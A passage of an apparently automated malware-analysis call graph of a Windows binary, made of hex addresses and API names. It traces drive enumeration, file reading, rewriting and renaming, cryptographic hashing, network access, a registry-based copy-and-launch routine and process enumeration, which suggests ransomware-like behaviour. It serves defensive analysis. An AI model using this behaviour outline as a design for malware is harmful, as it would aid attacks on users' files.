library calls 40118->42154 40121 2f3ff0 59 API calls 40119->40121 40121->40118 40122 2fa860 CreateThread WaitForSingleObject 40122->40117 42085 2fe690 40122->42085 40123->40090 40481 2f5c10 40124->40481 40126->39947 40127 2fa98c 40494 2f2840 40127->40494 40129 2fa997 40499 2f0fc0 CryptAcquireContextW 40129->40499 40131 2fa9ab 40132 2fa9c2 lstrlenA 40131->40132 40132->40126 40134 2fa9d8 40132->40134 40133 2f5c10 59 API calls 40135 2faa23 40133->40135 40134->40133 40136 2f2840 60 API calls 40135->40136 40137 2faa2e lstrcpyA 40136->40137 40139 2faa4b 40137->40139 40140 2f5c10 59 API calls 40139->40140 40141 2faa90 40140->40141 40142 2eef50 58 API calls 40141->40142 40143 2faaa0 40142->40143 40144 2f3ea0 59 API calls 40143->40144 40145 2faaf5 40143->40145 40144->40143 40522 2f3ff0 40145->40522 40147 2fab1d 40549 2f2900 40147->40549 40149 2eef50 58 API calls 40151 2fabc5 40149->40151 40150 2fab28 _memmove 40150->40149 40152 2f3ea0 59 API calls 40151->40152 40153 2fac1e 40151->40153 40152->40151 40154 2f3ff0 59 API calls 40153->40154 40155 2fac46 40154->40155 40156 2f2900 60 API calls 40155->40156 40158 2fac51 _memmove 40156->40158 40157 2eef50 58 API calls 40159 2facee 40157->40159 40158->40157 40160 2f3ea0 59 API calls 40159->40160 40161 2fad43 40159->40161 40160->40159 40162 2f3ff0 59 API calls 40161->40162 40163 2fad6b 40162->40163 40164 2f2900 60 API calls 40163->40164 40167 2fad76 _memmove 40164->40167 40165 2f5c10 59 API calls 40166 2fae2a 40165->40166 40554 2f3580 40166->40554 40167->40165 40169 2fae3c 40170 2f5c10 59 API calls 40169->40170 40171 2fae76 40170->40171 40172 2f3580 59 API calls 40171->40172 40173 2fae82 40172->40173 40174 2f5c10 59 API calls 40173->40174 40175 2faebc 40174->40175 40176 2f3580 59 API calls 40175->40176 40177 2faec8 40176->40177 40178 2f5c10 59 API calls 40177->40178 40179 2faf02 40178->40179 40180 2f3580 59 API calls 40179->40180 40181 2faf0e 40180->40181 40182 2f5c10 59 API calls 40181->40182 40183 2faf48 40182->40183 40184 2f3580 59 API calls 40183->40184 40185 2faf54 40184->40185 40186 2f5c10 59 API calls 40185->40186 40187 2faf8e 40186->40187 40188 2f3580 59 API calls 40187->40188 40189 2faf9a 40188->40189 40190 2f5c10 59 API calls 40189->40190 40191 2fafd4 40190->40191 40192 2f3580 59 API calls 40191->40192 40193 2fafe0 40192->40193 40561 2f3100 40193->40561 40195 2fb001 40196 2f3580 59 API calls 40195->40196 40197 2fb025 40196->40197 40198 2f3100 59 API calls 40197->40198 40199 2fb03c 40198->40199 40200 2f3580 59 API calls 40199->40200 40201 2fb059 40200->40201 40202 2f3100 59 API calls 40201->40202 40203 2fb070 40202->40203 40204 2f3580 59 API calls 40203->40204 40205 2fb07c 40204->40205 40206 2f3100 59 API calls 40205->40206 40207 2fb093 40206->40207 40208 2f3580 59 API calls 40207->40208 40209 2fb09f 40208->40209 40210 2f3100 59 API calls 40209->40210 40211 2fb0b6 40210->40211 40212 2f3580 59 API calls 40211->40212 40213 2fb0c2 40212->40213 40214 2f3100 59 API calls 40213->40214 40215 2fb0d9 40214->40215 40216 2f3580 59 API calls 40215->40216 40217 2fb0e5 40216->40217 40218 2f3100 59 API calls 40217->40218 40219 2fb0fc 40218->40219 40220 2f3580 59 API calls 40219->40220 40221 2fb108 40220->40221 40223 2fb130 40221->40223 40809 2fcdd0 59 API calls 40221->40809 40224 2eef50 58 API calls 40223->40224 40225 2fb16e 40224->40225 40227 2fb1a5 GetUserNameW 40225->40227 40568 2f2de0 40225->40568 40228 2fb1c9 40227->40228 40575 2f2c40 40228->40575 40230 2fb1d8 40582 2f2bf0 40230->40582 40234 2fb2f5 40593 2f36c0 40234->40593 40238 2fb311 40609 2f30b0 40238->40609 40240 2f2c40 59 API calls 40255 2fb1f3 40240->40255 40243 2fb327 40636 2f11c0 CreateFileW 40243->40636 40244 2f2900 60 API calls 40244->40255 40245 2f3580 59 API calls 40245->40255 40247 2fb33b 40721 2fba10 LoadCursorW RegisterClassExW 40247->40721 40249 2f3100 59 API calls 40249->40255 40250 2fb343 40722 2fba80 CreateWindowExW 40250->40722 40252 2fb34b 40252->40126 40725 2f0a50 GetLogicalDrives 40252->40725 40255->40234 40255->40240 40255->40244 40255->40245 40255->40249 40810 2ef1f0 59 API calls 40255->40810 40256 2fb379 40257 2f3100 59 API calls 40256->40257 40258 2fb3a5 40257->40258 40259 2f3580 59 API calls 40258->40259 40282 2fb3b3 40259->40282 40260 2fb48b 40777 2ffdc0 CreateThread 40260->40777 40262 2fb49f GetMessageW 40263 2fb4bf 40262->40263 40264 2fb4ed 40262->40264 40265 2fb4c5 TranslateMessage DispatchMessageW GetMessageW 40263->40265 40267 2fb55b 40264->40267 40268 2fb502 PostThreadMessageW 40264->40268 40265->40264 40265->40265 40270 2fb5bb 40267->40270 40271 2fb564 PostThreadMessageW 40267->40271 40269 2fb510 PeekMessageW 40268->40269 40273 2fb546 WaitForSingleObject 40269->40273 40274 2fb526 DispatchMessageW PeekMessageW 40269->40274 40270->40126 40277 2fb5d2 CloseHandle 40270->40277 40272 2fb570 PeekMessageW 40271->40272 40275 2fb5a6 WaitForSingleObject 40272->40275 40276 2fb586 DispatchMessageW PeekMessageW 40272->40276 40273->40267 40273->40269 40274->40273 40274->40274 40275->40270 40275->40272 40276->40275 40276->40276 40277->40126 40282->40260 40735 2fc330 40282->40735 40741 2fc240 40282->40741 40747 2fb8b0 40282->40747 40769 2f3260 40282->40769 40776 2ffa10 CreateThread 40282->40776 40283->39921 40284->39925 40285->39932 40289->39948 40290->39951 40291->39957 40292->39959 40293->39964 40294->39963 40295->39971 40296->39975 40297->39972 40299 308b08 40298->40299 40300 308b1b EnterCriticalSection 40298->40300 40308 308b9f 40299->40308 40300->39979 40302 308b0e 40302->40300 40332 307c2e 58 API calls 3 library calls 40302->40332 40305->39991 40306->39983 40307->39985 40309 308bab _raise 40308->40309 40310 308bb4 40309->40310 40311 308bcc 40309->40311 40333 307f51 58 API calls __NMSG_WRITE 40310->40333 40319 308bed _raise 40311->40319 40336 308cde 40311->40336 40313 308bb9 40334 307fae 58 API calls 5 library calls 40313->40334 40317 308bf7 40322 308af7 __lock 58 API calls 40317->40322 40318 308be8 40321 305208 __wopenfile 58 API calls 40318->40321 40319->40302 40320 308bc0 40335 307b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 40320->40335 40321->40319 40324 308bfe 40322->40324 40326 308c23 40324->40326 40327 308c0b 40324->40327 40329 300bed _free 58 API calls 40326->40329 40342 31263e InitializeCriticalSectionAndSpinCount 40327->40342 40330 308c17 40329->40330 40343 308c3f LeaveCriticalSection _doexit 40330->40343 40333->40313 40334->40320 40338 308cec 40336->40338 40337 300c62 _malloc 58 API calls 40337->40338 40338->40337 40339 308be1 40338->40339 40341 308cff 40338->40341 40339->40317 40339->40318 40341->40338 40341->40339 40344 3129c9 Sleep 40341->40344 40342->40330 40343->40319 40344->40341 40345->40015 40346->40018 40348 31aeb8 EncodePointer 40347->40348 40348->40348 40349 31aed2 40348->40349 40349->40022 40350->40024 40352 2ecf32 _memset __ftell_nolock 40351->40352 40353 2ecf4f InternetOpenW 40352->40353 40354 2f5c10 59 API calls 40353->40354 40355 2ecf8a InternetOpenUrlW 40354->40355 40356 2ecfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 40355->40356 40358 2ecfb2 40355->40358 40816 2f56d0 40356->40816 40358->40028 40359 2ed000 40360 2f56d0 59 API calls 40359->40360 40361 2ed049 40360->40361 40361->40358 40835 2f3010 59 API calls 40361->40835 40363 2ed084 40363->40358 40836 2f3010 59 API calls 40363->40836 40839 2fccc0 40365->40839 40859 2fcc50 40368->40859 40371 2fa04d 40371->40040 40371->40045 40374 2f3ad0 GetModuleFileNameW PathRemoveFileSpecW 40373->40374 40375 2f3ab2 40373->40375 40383 2f8400 40374->40383 40376 2f3aba 40375->40376 40377 2f3b00 40375->40377 40379 303b4c 59 API calls 40376->40379 40378 32f23e 59 API calls 40377->40378 40380 2f3ac7 40378->40380 40379->40380 40380->40374 40867 32f1bb 59 API calls 3 library calls 40380->40867 40384 2f8437 40383->40384 40388 2f8446 40383->40388 40384->40388 40868 2f5d50 40384->40868 40385 2f84b9 40385->40053 40388->40385 40878 2f8d50 59 API calls 40388->40878 40889 311781 40389->40889 40905 30f7c0 40392->40905 40395 2f1d20 _memset 40396 2f1d40 RegQueryValueExW RegCloseKey 40395->40396 40397 2f1d8f 40396->40397 40397->40397 40398 2f5c10 59 API calls 40397->40398 40399 2f1dbf 40398->40399 40400 2f1e7c 40399->40400 40401 2f1dd1 lstrlenA 40399->40401 40402 2f1e94 6 API calls 40400->40402 40404 2f1e89 40400->40404 40907 2f3520 40401->40907 40405 2f1ef5 UuidCreate UuidToStringW 40402->40405 40404->40402 40408 2f1f36 40405->40408 40406 2f1df1 40407 2f1e3c PathFileExistsW 40406->40407 40407->40400 40409 2f1e52 40407->40409 40410 2f5c10 59 API calls 40408->40410 40412 2f4690 59 API calls 40409->40412 40413 2f1e6a 40409->40413 40411 2f1f59 RpcStringFreeW PathAppendW CreateDirectoryW 40410->40411 40414 2f1f98 40411->40414 40416 2f1fce 40411->40416 40412->40413 40413->40084 40415 2f5c10 59 API calls 40414->40415 40415->40416 40417 2f5c10 59 API calls 40416->40417 40418 2f201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 40417->40418 40419 2f207c _memset 40418->40419 40420 2f21d1 40418->40420 40421 2f2095 6 API calls 40419->40421 40420->40413 40422 2f2109 40421->40422 40423 2f2115 _memset 40421->40423 40424 2f3260 59 API calls 40422->40424 40425 2f2125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 40423->40425 40424->40423 40426 2f21aa GetLastError 40425->40426 40427 2f21b2 40425->40427 40426->40420 40428 2f21c0 WaitForSingleObject 40427->40428 40428->40420 40428->40428 40430 30f7c0 __ftell_nolock 40429->40430 40431 2f222d 7 API calls 40430->40431 40432 2f22bd K32EnumProcesses 40431->40432 40433 2f228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 40431->40433 40434 2f22df 40432->40434 40435 2f22d3 40432->40435 40433->40432 40436 2f2353 40434->40436 40437 2f22f0 OpenProcess 40434->40437 40435->40056 40436->40056 40438 2f230a K32EnumProcessModules 40437->40438 40439 2f2346 CloseHandle 40437->40439 40438->40439 40440 2f231c K32GetModuleBaseNameW 40438->40440 40439->40436 40439->40437 40910 300235 40440->40910 40442 2f233e 40442->40439 40443 2f2345 40442->40443 40443->40439 40445 300c62 _malloc 58 API calls 40444->40445 40448 2eef6e _memset 40445->40448 40446 2eefdc 40446->40061 40447 300c62 _malloc 58 API calls 40447->40448 40448->40446 40448->40447 40448->40448 40450 2f3f05 40449->40450 40456 2f3eae 40449->40456 40451 2f3f18 40450->40451 40452 2f3fb1 40450->40452 40454 2f3f2d 40451->40454 40455 2f3fbb 40451->40455 40464 2f3f3d _signal 40451->40464 40453 32f23e 59 API calls 40452->40453 40453->40455 40454->40464 40924 2f6760 59 API calls 2 library calls 40454->40924 40457 32f23e 59 API calls 40455->40457 40456->40450 40460 2f3ed4 40456->40460 40459 2f3fc5 40457->40459 40461 2f3ff0 59 API calls 40459->40461 40462 2f3eef 40460->40462 40463 2f3ed9 40460->40463 40465 2f3fdf 40461->40465 40923 2f3da0 59 API calls _signal 40462->40923 40922 2f3da0 59 API calls _signal 40463->40922 40464->40061 40465->40061 40468 2f3ee9 40468->40061 40469 2f3eff 40469->40061 40925 2ee670 40470->40925 40472 2ee79e 40473 2f3ea0 59 API calls 40472->40473 40474 2ee7c3 40473->40474 40475 2f3ff0 59 API calls 40474->40475 40476 2ee7ff 40475->40476 40951 2ee870 40476->40951 40478 2ee806 40479 2f3ff0 59 API calls 40478->40479 40480 2ee80d 40478->40480 40479->40480 40480->40122 40482 2f5c66 40481->40482 40486 2f5c1e 40481->40486 40483 2f5cff 40482->40483 40484 2f5c76 40482->40484 40485 32f23e 59 API calls 40483->40485 40487 2f6950 59 API calls 40484->40487 40491 2f5c88 _signal 40484->40491 40488 2f5d09 40485->40488 40486->40482 40493 2f4690 59 API calls 40486->40493 40487->40491 40489 2f5d1b 40488->40489 41219 32f26c 59 API calls 3 library calls 40488->41219 40489->40127 40491->40127 40492 2f5d4e 40493->40482 41220 2f3c40 40494->41220 40496 2f288c WideCharToMultiByte 41230 2f84e0 40496->41230 40498 2f28cf 40498->40129 40500 2f102b CryptCreateHash 40499->40500 40501 2f101a 40499->40501 40502 2f1056 lstrlenA CryptHashData 40500->40502 40503 2f1045 40500->40503 41240 310eca RaiseException 40501->41240 40506 2f107f CryptGetHashParam 40502->40506 40507 2f106e 40502->40507 41241 310eca RaiseException 40503->41241 40509 2f109f 40506->40509 40511 2f10b0 _memset 40506->40511 41242 310eca RaiseException 40507->41242 41243 310eca RaiseException 40509->41243 40512 2f10cf CryptGetHashParam 40511->40512 40513 2f10f5 40512->40513 40514 2f10e4 40512->40514 40515 300c62 _malloc 58 API calls 40513->40515 41244 310eca RaiseException 40514->41244 40517 2f1105 _memset 40515->40517 40518 2f1148 40517->40518 40519 3004a6 _sprintf 83 API calls 40517->40519 40520 2f114e CryptDestroyHash CryptReleaseContext 40518->40520 40521 2f1133 lstrcatA 40519->40521 40520->40131 40521->40517 40521->40518 40523 2f4009 40522->40523 40524 2f40f2 40522->40524 40526 2f405d 40523->40526 40527 2f4016 40523->40527 41248 32f26c 59 API calls 3 library calls 40524->41248 40530 2f4106 40526->40530 40531 2f4066 40526->40531 40528 2f40fc 40527->40528 40529 2f4022 40527->40529 41249 32f26c 59 API calls 3 library calls 40528->41249 40533 2f402b 40529->40533 40534 2f4044 40529->40534 40535 32f23e 59 API calls 40530->40535 40545 2f4078 _signal 40531->40545 41247 2f6760 59 API calls 2 library calls 40531->41247 41245 2f2e80 59 API calls _memmove 40533->41245 41246 2f2e80 59 API calls _memmove 40534->41246 40537 2f4110 40535->40537 40541 2f412c 40537->40541 40542 2f413a 40537->40542 40540 2f403b 40540->40147 40544 2f56d0 59 API calls 40541->40544 40547 2f56d0 59 API calls 40542->40547 40543 2f4054 40543->40147 40546 2f4135 40544->40546 40545->40147 40546->40147 40548 2f4151 40547->40548 40548->40147 40550 2f3a90 59 API calls 40549->40550 40551 2f294c MultiByteToWideChar 40550->40551 40552 2f8400 59 API calls 40551->40552 40553 2f298d 40552->40553 40553->40150 40555 2f35d6 40554->40555 40556 2f3591 40554->40556 40560 2f35b7 40555->40560 41251 2f4f70 59 API calls 40555->41251 40556->40555 40558 2f3597 40556->40558 40558->40560 41250 2f4f70 59 API calls 40558->41250 40560->40169 40562 2f3133 40561->40562 40563 2f3121 40561->40563 40566 2f5c10 59 API calls 40562->40566 40564 2f5c10 59 API calls 40563->40564 40565 2f312c 40564->40565 40565->40195 40567 2f3159 40566->40567 40567->40195 40569 2f2dec 40568->40569 40570 2f2dfa 40568->40570 40571 2f3ea0 59 API calls 40569->40571 40573 2f3ea0 59 API calls 40570->40573 40572 2f2df5 40571->40572 40572->40225 40574 2f2e11 40573->40574 40574->40225 40576 2f2c5f 40575->40576 40578 2f2c71 40575->40578 40577 2f56d0 59 API calls 40576->40577 40579 2f2c6a 40577->40579 40578->40578 40580 2f56d0 59 API calls 40578->40580 40579->40230 40581 2f2c8a 40580->40581 40581->40230 40583 2f3ff0 59 API calls 40582->40583 40584 2f2c13 40583->40584 40585 2eecb0 40584->40585 40587 2eece5 40585->40587 40588 2eeefc 40587->40588 41252 301b3b 59 API calls 3 library calls 40587->41252 40588->40255 40589 2eed6b _memmove 40589->40588 40590 2f56d0 59 API calls 40589->40590 40591 2f5230 59 API calls 40589->40591 41253 301b3b 59 API calls 3 library calls 40589->41253 40590->40589 40591->40589 40594 2f36e7 40593->40594 40595 2f3742 40593->40595 40594->40595 40599 2f36ed 40594->40599 40598 2f370d 40595->40598 41255 2f4f70 59 API calls 40595->41255 40597 2f377f 40602 2eca70 40597->40602 40598->40597 40601 2f4690 59 API calls 40598->40601 40599->40598 41254 2f4f70 59 API calls 40599->41254 40601->40597 40603 2ecb64 40602->40603 40608 2ecaa3 40602->40608 40603->40238 40604 2ecb6b 41256 32f26c 59 API calls 3 library calls 40604->41256 40606 2ecb75 40606->40238 40607 2f36c0 59 API calls 40607->40608 40608->40603 40608->40604 40608->40607 40610 2f4690 59 API calls 40609->40610 40611 2f30d4 40610->40611 40612 2ec740 40611->40612 41257 300fdd 40612->41257 40615 2ec944 CreateDirectoryW 40617 300fdd 115 API calls 40615->40617 40623 2ec960 40617->40623 40618 2ec90e 40618->40615 40627 2ec96a 40618->40627 40619 2ec906 41280 303a38 83 API calls 5 library calls 40619->41280 40621 2ec9d5 41282 3028fd 82 API calls 6 library calls 40621->41282 40623->40621 40623->40627 41281 3028fd 82 API calls 6 library calls 40623->41281 40625 2ec9ed 41283 3028fd 82 API calls 6 library calls 40625->41283 40626 300546 58 API calls 40630 2ec79e _memmove 40626->40630 40627->40243 40630->40619 40630->40626 40633 2f5c10 59 API calls 40630->40633 40635 2f4f70 59 API calls 40630->40635 41267 301101 40630->41267 40631 2ec9f8 41284 303a38 83 API calls 5 library calls 40631->41284 40633->40630 40634 2ec9fe 40634->40627 40635->40630 40637 2f1223 GetFileSizeEx 40636->40637 40653 2f1287 40636->40653 40638 2f1234 40637->40638 40639 2f12a3 VirtualAlloc 40637->40639 40638->40639 40641 2f123c CloseHandle 40638->40641 40640 2f131a CloseHandle 40639->40640 40644 2f12c0 _memset 40639->40644 40640->40247 40642 2f3100 59 API calls 40641->40642 40643 2f1253 40642->40643 41679 2f59d0 40643->41679 40646 2f12e9 SetFilePointerEx 40644->40646 40679 2f13a7 40644->40679 40649 2f130c VirtualFree 40646->40649 40650 2f1332 ReadFile 40646->40650 40647 2f13b7 SetFilePointer 40651 2f13f5 ReadFile 40647->40651 40719 2f15ae 40647->40719 40648 2f126a MoveFileW 40648->40653 40649->40640 40650->40649 40654 2f134f 40650->40654 40655 2f140f VirtualFree CloseHandle 40651->40655 40656 2f1440 40651->40656 40652 2f15c5 SetFilePointerEx 40652->40655 40657 2f15df 40652->40657 40653->40247 40654->40649 40658 2f1356 40654->40658 40659 2f142f 40655->40659 40661 2f1718 lstrlenA 40656->40661 40662 2f1471 lstrlenA 40656->40662 40656->40719 40660 2f15ed WriteFile 40657->40660 40664 2f1602 40657->40664 40658->40647 40663 2f2c40 59 API calls 40658->40663 40659->40247 40660->40655 40660->40664 41757 300be4 40661->41757 41705 300be4 40662->41705 40668 2f1364 40663->40668 40666 2f30b0 59 API calls 40664->40666 40670 2f1631 40666->40670 40678 2f1379 VirtualFree CloseHandle 40668->40678 40668->40679 40673 2f2840 60 API calls 40670->40673 40676 2f163c WriteFile 40673->40676 40685 2f1658 40676->40685 40683 2f1396 40678->40683 40679->40647 40683->40247 40685->40655 40686 2f1660 lstrlenA WriteFile 40685->40686 40686->40655 40687 2f1686 CloseHandle 40686->40687 40689 2f3100 59 API calls 40687->40689 40690 2f16a3 40689->40690 40691 2f59d0 59 API calls 40690->40691 40693 2f16be MoveFileW 40691->40693 40695 2f16e4 VirtualFree 40693->40695 40699 2f18a7 40693->40699 40700 2f16fc 40695->40700 40703 2f18d5 VirtualFree 40699->40703 40704 2f18e3 40699->40704 40700->40247 40703->40704 40704->40653 40706 2f18e8 CloseHandle 40704->40706 40706->40653 40719->40652 40721->40250 40723 2fbabb ShowWindow UpdateWindow 40722->40723 40724 2fbab9 40722->40724 40723->40252 40724->40252 40728 2f0a81 40725->40728 40726 2f56d0 59 API calls 40726->40728 40727 2f0bb4 40727->40256 40728->40726 40728->40727 40729 2f3ea0 59 API calls 40728->40729 40732 2f3ff0 59 API calls 40728->40732 40733 2f2900 60 API calls 40728->40733 40734 2f3580 59 API calls 40728->40734 40730 2f0ae0 SetErrorMode PathFileExistsA SetErrorMode 40729->40730 40730->40728 40731 2f0b0c GetDriveTypeA 40730->40731 40731->40728 40732->40728 40733->40728 40734->40728 40736 2fd3c0 59 API calls 40735->40736 40737 2fc347 40736->40737 40738 2fc35b 40737->40738 40739 32f23e 59 API calls 40737->40739 40738->40282 40740 2fc37a 40739->40740 40740->40282 40742 2fd340 59 API calls 40741->40742 40743 2fc257 40742->40743 40744 2fc26b 40743->40744 40745 32f23e 59 API calls 40743->40745 40744->40282 40746 2fc28a 40745->40746 40746->40282 40748 2fb8d6 40747->40748 40750 2fb8e0 40747->40750 40749 2f4690 59 API calls 40748->40749 40749->40750 40751 2fb916 40750->40751 40752 2f4690 59 API calls 40750->40752 40753 2fb930 40751->40753 40754 2f4690 59 API calls 40751->40754 40752->40751 40755 2fb94a 40753->40755 40756 2f4690 59 API calls 40753->40756 40754->40753 40757 2fb964 40755->40757 40758 2f4690 59 API calls 40755->40758 40756->40755 41846 2fbfd0 40757->41846 40758->40757 40760 2fb976 40761 2fbfd0 59 API calls 40760->40761 40762 2fb988 40761->40762 40763 2fbfd0 59 API calls 40762->40763 40764 2fb99a 40763->40764 40765 2fb9b4 40764->40765 40766 2f4690 59 API calls 40764->40766 40767 2fb9f2 40765->40767 40768 2f3ff0 59 API calls 40765->40768 40766->40765 40767->40282 40768->40767 40770 2f326f 40769->40770 40771 2f327d 40769->40771 40772 2f5c10 59 API calls 40770->40772 40774 2f5c10 59 API calls 40771->40774 40773 2f3278 40772->40773 40773->40282 40775 2f329c 40774->40775 40775->40282 40776->40282 41867 2ff130 timeGetTime 40776->41867 40777->40262 42067 2ffd80 40777->42067 40778->40035 40780 2f1af4 40779->40780 40781 2f1ad0 40779->40781 40780->40080 40782 2f1afc 40781->40782 40783 2f1adc DispatchMessageW PeekMessageW 40781->40783 40782->40080 40783->40780 40783->40781 40785 2f478c 40784->40785 40786 2f46a9 40784->40786 42081 32f26c 59 API calls 3 library calls 40785->42081 40788 2f46e9 40786->40788 40789 2f46b6 40786->40789 40792 2f46f5 40788->40792 40793 2f47a0 40788->40793 40790 2f4796 40789->40790 40791 2f46c2 40789->40791 42082 32f26c 59 API calls 3 library calls 40790->42082 42080 2f3340 59 API calls _memmove 40791->42080 40796 2f6950 59 API calls 40792->40796 40803 2f4707 _signal 40792->40803 40795 32f23e 59 API calls 40793->40795 40797 2f47aa 40795->40797 40796->40803 40798 2f47bf 40797->40798 40799 2f47cd 40797->40799 40801 2f5c10 59 API calls 40798->40801 40805 2f5c10 59 API calls 40799->40805 40804 2f47c8 40801->40804 40802 2f46e0 40802->40077 40803->40077 40804->40077 40806 2f47ec 40805->40806 40806->40077 40807->40102 40808->40081 40809->40223 40810->40255 42083 310cfc 58 API calls std::exception::_Copy_str 40811->42083 40813 32f256 42084 310eca RaiseException 40813->42084 40815 32f26b 40817 2f5735 40816->40817 40822 2f56de 40816->40822 40818 2f573e 40817->40818 40819 2f57bc 40817->40819 40821 2f5750 _signal 40818->40821 40837 2f6760 59 API calls 2 library calls 40818->40837 40820 32f23e 59 API calls 40819->40820 40823 2f57c6 40820->40823 40821->40359 40822->40817 40827 2f5704 40822->40827 40825 2f57db 40823->40825 40838 32f26c 59 API calls 3 library calls 40823->40838 40825->40359 40829 2f571f 40827->40829 40830 2f5709 40827->40830 40828 2f5806 40832 2f3ff0 59 API calls 40829->40832 40831 2f3ff0 59 API calls 40830->40831 40833 2f5719 40831->40833 40834 2f572f 40832->40834 40833->40359 40834->40359 40835->40363 40836->40358 40837->40821 40838->40828 40845 303b4c 40839->40845 40841 2fccca 40842 2fa00a 40841->40842 40855 32f1bb 59 API calls 3 library calls 40841->40855 40842->40037 40842->40038 40847 303b54 40845->40847 40846 300c62 _malloc 58 API calls 40846->40847 40847->40846 40848 303b6e 40847->40848 40850 303b72 std::exception::exception 40847->40850 40856 30793d DecodePointer 40847->40856 40848->40841 40857 310eca RaiseException 40850->40857 40852 303b9c 40858 310d91 58 API calls _free 40852->40858 40854 303bae 40854->40841 40856->40847 40857->40852 40858->40854 40860 303b4c 59 API calls 40859->40860 40861 2fcc5d 40860->40861 40864 2fcc64 40861->40864 40866 32f1bb 59 API calls 3 library calls 40861->40866 40864->40371 40865 2fd740 59 API calls 40864->40865 40865->40371 40869 2f5dfe 40868->40869 40870 2f5d66 40868->40870 40871 32f23e 59 API calls 40869->40871 40877 2f5d84 _signal 40870->40877 40879 2f6950 40870->40879 40873 2f5e08 40871->40873 40875 32f23e 59 API calls 40873->40875 40874 2f5d76 40874->40388 40876 2f5e1a 40875->40876 40876->40388 40877->40388 40878->40388 40880 2f6986 40879->40880 40881 2f69d3 40880->40881 40882 303b4c 59 API calls 40880->40882 40884 2f6a0d _signal 40880->40884 40881->40884 40888 32f1bb 59 API calls 3 library calls 40881->40888 40882->40881 40884->40874 40892 311570 40889->40892 40895 311580 40892->40895 40893 311586 40894 305208 __wopenfile 58 API calls 40893->40894 40896 31158b 40894->40896 40895->40893 40899 3115ae 40895->40899 40903 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40896->40903 40901 3115cf wcstoxq 40899->40901 40904 30e883 GetStringTypeW 40899->40904 40900 2fa36e lstrcpyW lstrcpyW 40900->40072 40901->40900 40902 305208 __wopenfile 58 API calls 40901->40902 40902->40900 40903->40900 40904->40899 40906 2f1cf2 RegOpenKeyExW 40905->40906 40906->40395 40906->40413 40908 2f4690 59 API calls 40907->40908 40909 2f3550 40908->40909 40909->40406 40911 3002b6 40910->40911 40912 300241 40910->40912 40921 3002c8 60 API calls 3 library calls 40911->40921 40914 305208 __wopenfile 58 API calls 40912->40914 40919 300266 40912->40919 40916 30024d 40914->40916 40915 3002c3 40915->40442 40920 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40916->40920 40918 300258 40918->40442 40919->40442 40920->40918 40921->40915 40922->40468 40923->40469 40924->40464 40926 300c62 _malloc 58 API calls 40925->40926 40927 2ee684 40926->40927 40928 300c62 _malloc 58 API calls 40927->40928 40929 2ee690 40928->40929 40930 2ee699 40929->40930 40931 2ee6b4 GetAdaptersInfo 40929->40931 40932 301f2d _wprintf 85 API calls 40930->40932 40933 2ee6db GetAdaptersInfo 40931->40933 40934 2ee6c4 40931->40934 40936 2ee6a3 40932->40936 40935 2ee6ea 40933->40935 40950 2ee741 40933->40950 40937 300bed _free 58 API calls 40934->40937 40975 3004a6 40935->40975 40940 300bed _free 58 API calls 40936->40940 40938 2ee6ca 40937->40938 40942 300c62 _malloc 58 API calls 40938->40942 40944 2ee6a9 40940->40944 40941 300bed _free 58 API calls 40945 2ee74a 40941->40945 40946 2ee6d2 40942->40946 40944->40472 40945->40472 40946->40930 40946->40933 40948 2ee737 40949 301f2d _wprintf 85 API calls 40948->40949 40949->40950 40950->40941 40952 2f56d0 59 API calls 40951->40952 40953 2ee8bb CryptAcquireContextW 40952->40953 40954 2ee8d8 40953->40954 40955 2ee8e9 CryptCreateHash 40953->40955 41214 310eca RaiseException 40954->41214 40957 2ee914 CryptHashData 40955->40957 40958 2ee903 40955->40958 40959 2ee932 40957->40959 40960 2ee943 CryptGetHashParam 40957->40960 41215 310eca RaiseException 40958->41215 41216 310eca RaiseException 40959->41216 40963 2ee963 40960->40963 40965 2ee974 _memset 40960->40965 41217 310eca RaiseException 40963->41217 40966 2ee993 CryptGetHashParam 40965->40966 40967 2ee9a8 40966->40967 40973 2ee9b9 40966->40973 41218 310eca RaiseException 40967->41218 40969 2eea10 40971 2eea16 CryptDestroyHash CryptReleaseContext 40969->40971 40970 3004a6 _sprintf 83 API calls 40970->40973 40972 2eea33 40971->40972 40972->40478 40973->40969 40973->40970 40974 2f3ea0 59 API calls 40973->40974 40974->40973 40976 3004c2 40975->40976 40977 3004d7 40975->40977 40978 305208 __wopenfile 58 API calls 40976->40978 40977->40976 40979 3004de 40977->40979 40980 3004c7 40978->40980 41004 306ab6 40979->41004 41003 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40980->41003 40983 300504 40984 2ee725 40983->40984 41028 3064ef 78 API calls 6 library calls 40983->41028 40986 301f2d 40984->40986 40987 301f39 _raise 40986->40987 40988 301f4a 40987->40988 40989 301f5f __stbuf 40987->40989 40990 305208 __wopenfile 58 API calls 40988->40990 41063 300e92 40989->41063 40991 301f4f 40990->40991 41079 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 40991->41079 40994 301f6f __stbuf 41068 30afd2 40994->41068 40995 301f5a _raise 40995->40948 40997 301f82 __stbuf 40998 306ab6 __output_l 83 API calls 40997->40998 40999 301f9b __stbuf 40998->40999 41075 30afa1 40999->41075 41003->40984 41029 30019c 41004->41029 41007 305208 __wopenfile 58 API calls 41008 306b30 41007->41008 41009 307601 41008->41009 41024 306b50 __aulldvrm __woutput_s_l _strlen 41008->41024 41044 30816b 41008->41044 41010 305208 __wopenfile 58 API calls 41009->41010 41011 307606 41010->41011 41052 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41011->41052 41013 3075db 41037 30a77e 41013->41037 41016 3075fd 41016->40983 41018 30766a 78 API calls _write_multi_char 41018->41024 41019 3071b9 DecodePointer 41019->41024 41020 300bed _free 58 API calls 41020->41024 41021 31adf7 60 API calls __cftof 41021->41024 41022 308cde __malloc_crt 58 API calls 41022->41024 41023 30721c DecodePointer 41023->41024 41024->41009 41024->41013 41024->41018 41024->41019 41024->41020 41024->41021 41024->41022 41024->41023 41025 307241 DecodePointer 41024->41025 41026 3076b2 78 API calls _write_multi_char 41024->41026 41027 3076de 78 API calls _write_string 41024->41027 41051 302bcc 58 API calls _LocaleUpdate::_LocaleUpdate 41024->41051 41025->41024 41026->41024 41027->41024 41028->40984 41030 3001ad 41029->41030 41036 3001fa 41029->41036 41053 305007 41030->41053 41032 3001b3 41033 3001da 